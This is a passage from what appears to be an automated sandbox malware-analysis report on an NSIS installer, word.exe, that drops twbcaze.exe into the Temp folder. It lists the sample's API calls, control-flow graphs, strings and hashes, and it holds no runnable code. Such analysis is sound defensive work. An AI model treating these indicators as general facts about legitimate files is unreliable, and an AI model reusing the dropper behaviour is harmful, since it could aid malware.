403d39-403d66 CreateDialogParamA 223->225 224->154 226 403d1a 224->226 225->156 227 403d6c-403dc3 call 403e54 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->153 227->153 232 403dc5-403ddd ShowWindow call 403ea0 227->232 232->156
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                          • ShowWindow.USER32(?), ref: 004039DA
                                          • DestroyWindow.USER32 ref: 004039EE
                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A0A
                                          • GetDlgItem.USER32(?,?), ref: 00403A2B
                                          • SendMessageA.USER32 ref: 00403A3F
                                          • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                          • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                          • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                          • SendMessageA.USER32 ref: 00403B69
                                          • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                          • ShowWindow.USER32(00000000,?), ref: 00403C30
                                          • EnableWindow.USER32(?,?), ref: 00403C42
                                          • EnableWindow.USER32(?,?), ref: 00403C5D
                                          • GetSystemMenu.USER32 ref: 00403C73
                                          • EnableMenuItem.USER32 ref: 00403C7A
                                          • SendMessageA.USER32 ref: 00403C92
                                          • SendMessageA.USER32 ref: 00403CA5
                                          • lstrlenA.KERNEL32(00420538,?,00420538,nrdosueajqjitn Setup), ref: 00403CCE
                                          • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                          • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                          • String ID: nrdosueajqjitn Setup
                                          • API String ID: 184305955-1765078079
                                          • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                          • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                          • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                          • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 235 4035eb-403603 call 405f28 238 403605-403615 call 405af6 235->238 239 403617-40363e call 405a7f 235->239 248 403661-40368a call 4038b4 call 40576c 238->248 244 403640-403651 call 405a7f 239->244 245 403656-40365c lstrcatA 239->245 244->245 245->248 253 403690-403695 248->253 254 403711-403719 call 40576c 248->254 253->254 255 403697-4036bb call 405a7f 253->255 260 403727-40374c LoadImageA 254->260 261 40371b-403722 call 405bba 254->261 255->254 262 4036bd-4036bf 255->262 264 403752-403788 RegisterClassA 260->264 265 4037db-4037e3 call 40140b 260->265 261->260 266 4036d0-4036dc lstrlenA 262->266 267 4036c1-4036ce call 4056b6 262->267 268 4038aa 264->268 269 40378e-4037d6 SystemParametersInfoA CreateWindowExA 264->269 279 4037e5-4037e8 265->279 280 4037ed-4037f8 call 4038b4 265->280 273 403704-40370c call 40568b call 405b98 266->273 274 4036de-4036ec lstrcmpiA 266->274 267->266 272 4038ac-4038b3 268->272 269->265 273->254 274->273 278 4036ee-4036f8 GetFileAttributesA 274->278 283 4036fa-4036fc 278->283 284 4036fe-4036ff call 4056d2 278->284 279->272 288 403881-403889 call 404f56 280->288 289 4037fe-403818 ShowWindow call 405eba 280->289 283->273 283->284 284->273 294 4038a3-4038a5 call 40140b 288->294 295 40388b-403891 288->295 296 403824-403836 GetClassInfoA 289->296 297 40381a-40381f call 405eba 289->297 294->268 295->279 298 403897-40389e call 40140b 295->298 301 403838-403848 GetClassInfoA RegisterClassA 296->301 302 40384e-403871 DialogBoxParamA call 40140b 296->302 297->296 298->279 301->302 306 403876-40387f call 40353b 302->306 306->272
                                          APIs
                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                          • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 0040365C
                                          • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                          • lstrcmpiA.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                          • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ), ref: 004036EF
                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                            • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                          • RegisterClassA.USER32 ref: 0040377F
                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                          • CreateWindowExA.USER32 ref: 004037D0
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                          • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                          • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                          • RegisterClassA.USER32(004236E0), ref: 00403848
                                          • DialogBoxParamA.USER32 ref: 00403867
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$6B
                                          • API String ID: 1975747703-2232938697
                                          • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                          • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                          • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                          • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 309 402c55-402ca3 GetTickCount GetModuleFileNameA call 40586f 312 402ca5-402caa 309->312 313 402caf-402cdd call 405b98 call 4056d2 call 405b98 GetFileSize 309->313 314 402e87-402e8b 312->314 321 402ce3 313->321 322 402dca-402dd8 call 402bf1 313->322 323 402ce8-402cff 321->323 329 402dda-402ddd 322->329 330 402e2d-402e32 322->330 325 402d01 323->325 326 402d03-402d05 call 403081 323->326 325->326 333 402d0a-402d0c 326->333 331 402e01-402e2b GlobalAlloc call 4030b3 call 402e8e 329->331 332 402ddf-402df0 call 4030b3 call 403081 329->332 330->314 331->330 360 402e3e-402e4f 331->360 349 402df5-402df7 332->349 335 402d12-402d19 333->335 336 402e34-402e3c call 402bf1 333->336 339 402d95-402d99 335->339 340 402d1b-402d2f call 405830 335->340 336->330 344 402da3-402da9 339->344 345 402d9b-402da2 call 402bf1 339->345 340->344 358 402d31-402d38 340->358 351 402db8-402dc2 344->351 352 402dab-402db5 call 405f97 344->352 345->344 349->330 355 402df9-402dff 349->355 351->323 359 402dc8 351->359 352->351 355->330 355->331 358->344 364 402d3a-402d41 358->364 359->322 361 402e51 360->361 362 402e57-402e5c 360->362 361->362 365 402e5d-402e63 362->365 364->344 366 402d43-402d4a 364->366 365->365 367 402e65-402e80 SetFilePointer call 405830 365->367 366->344 368 402d4c-402d53 366->368 371 402e85 367->371 368->344 370 402d55-402d75 368->370 370->330 372 402d7b-402d7f 370->372 371->314 373 402d81-402d85 372->373 374 402d87-402d8f 372->374 373->359 373->374 374->344 375 402d91-402d93 374->375 375->344
                                          APIs
                                          • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00402C82
                                            • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405873
                                            • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                          • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00402CCE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                          • API String ID: 4283519449-2207440701
                                          • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                          • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                          • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                          • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 445 402e8e-402ea2 446 402ea4 445->446 447 402eab-402eb3 445->447 446->447 448 402eb5 447->448 449 402eba-402ebf 447->449 448->449 450 402ec1-402eca call 4030b3 449->450 451 402ecf-402edc call 403081 449->451 450->451 455 402ee2-402ee6 451->455 456 40302c 451->456 457 403015-403017 455->457 458 402eec-402f0c GetTickCount call 406005 455->458 459 40302e-40302f 456->459 460 403019-40301c 457->460 461 40306c-403070 457->461 469 403077 458->469 471 402f12-402f1a 458->471 463 40307a-40307e 459->463 466 403021-40302a call 403081 460->466 467 40301e 460->467 464 403031-403037 461->464 465 403072 461->465 472 403039 464->472 473 40303c-40304a call 403081 464->473 465->469 466->456 479 403074 466->479 467->466 469->463 476 402f1c 471->476 477 402f1f-402f2d call 403081 471->477 472->473 473->456 481 40304c-40305f WriteFile 473->481 476->477 477->456 483 402f33-402f3c 477->483 479->469 484 403011-403013 481->484 485 403061-403064 481->485 486 402f42-402f5f call 406025 483->486 484->459 485->484 487 403066-403069 485->487 490 402f65-402f7c GetTickCount 486->490 491 40300d-40300f 486->491 487->461 492 402fc1-402fc5 490->492 493 402f7e-402f86 490->493 491->459 496 403002-403005 492->496 497 402fc7-402fca 492->497 494 402f88-402f8c 493->494 495 402f8e-402fbe MulDiv wsprintfA call 404e84 493->495 494->492 494->495 495->492 496->471 498 40300b 496->498 500 402fea-402ff0 497->500 501 402fcc-402fde WriteFile 497->501 498->469 502 402ff6-402ffa 500->502 501->484 504 402fe0-402fe3 501->504 502->486 505 403000 502->505 504->484 506 402fe5-402fe8 504->506 505->469 506->502
                                          APIs
                                          • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EEC
                                          • GetTickCount.KERNEL32(0040B0E0,00004000), ref: 00402F6D
                                          • MulDiv.KERNEL32 ref: 00402F9A
                                          • wsprintfA.USER32 ref: 00402FAA
                                          • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CountTick$FileWritewsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 4209647438-2449383134
                                          • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                          • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                          • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                          • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 507 401751-401774 call 402a29 call 4056f8 512 401776-40177c call 405b98 507->512 513 40177e-401790 call 405b98 call 40568b lstrcatA 507->513 518 401795-40179b call 405dfa 512->518 513->518 523 4017a0-4017a4 518->523 524 4017a6-4017b0 call 405e93 523->524 525 4017d7-4017da 523->525 533 4017c2-4017d4 524->533 534 4017b2-4017c0 CompareFileTime 524->534 526 4017e2-4017fe call 40586f 525->526 527 4017dc-4017dd call 405850 525->527 535 401800-401803 526->535 536 401876-40189f call 404e84 call 402e8e 526->536 527->526 533->525 534->533 537 401805-401847 call 405b98 * 2 call 405bba call 405b98 call 405459 535->537 538 401858-401862 call 404e84 535->538 550 4018a1-4018a5 536->550 551 4018a7-4018b3 SetFileTime 536->551 537->523 570 40184d-40184e 537->570 548 40186b-401871 538->548 553 4028c7 548->553 550->551 552 4018b9-4018c4 CloseHandle 550->552 551->552 555 4018ca-4018cd 552->555 556 4028be-4028c1 552->556 558 4028c9-4028cd 553->558 559 4018e2-4018e5 call 405bba 555->559 560 4018cf-4018e0 call 405bba lstrcatA 555->560 556->553 566 4018ea-402246 call 405459 559->566 560->566 566->556 566->558 570->548 572 401850-401851 570->572 572->538
                                          APIs
                                          • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                          • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000000,00000000,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                            • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,nrdosueajqjitn Setup,NSIS Error), ref: 00405BA5
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                            • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                            • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" $C:\Users\user\AppData\Local\Temp
                                          • API String ID: 1941528284-3433136141
                                          • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                          • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                          • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                          • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered image in the original report; legend: Executed / Not Executed)
                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                          • GetLastError.KERNEL32 ref: 0040539D
                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                          • GetLastError.KERNEL32 ref: 004053BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                          • String ID: C:\Users\user\AppData\Roaming$Ls@$\s@
                                          • API String ID: 3449924974-4232301360
                                          • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                          • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                          • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                          • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered image in the original report; legend: Executed / Not Executed)
                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                          • wsprintfA.USER32 ref: 00405F0A
                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%s.dll$UXTHEME$\
                                          • API String ID: 2200240437-4240819195
                                          • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                          • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                          • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                          • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered image in the original report; legend: Executed / Not Executed)
                                          APIs
                                          • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\word.exe,004030F9,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004058B1
                                          • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$nsa
                                          • API String ID: 1716503409-3536471476
                                          • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                          • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                          • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                          • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered image in the original report; legend: Executed / Not Executed)
                                          APIs
                                            • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                            • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
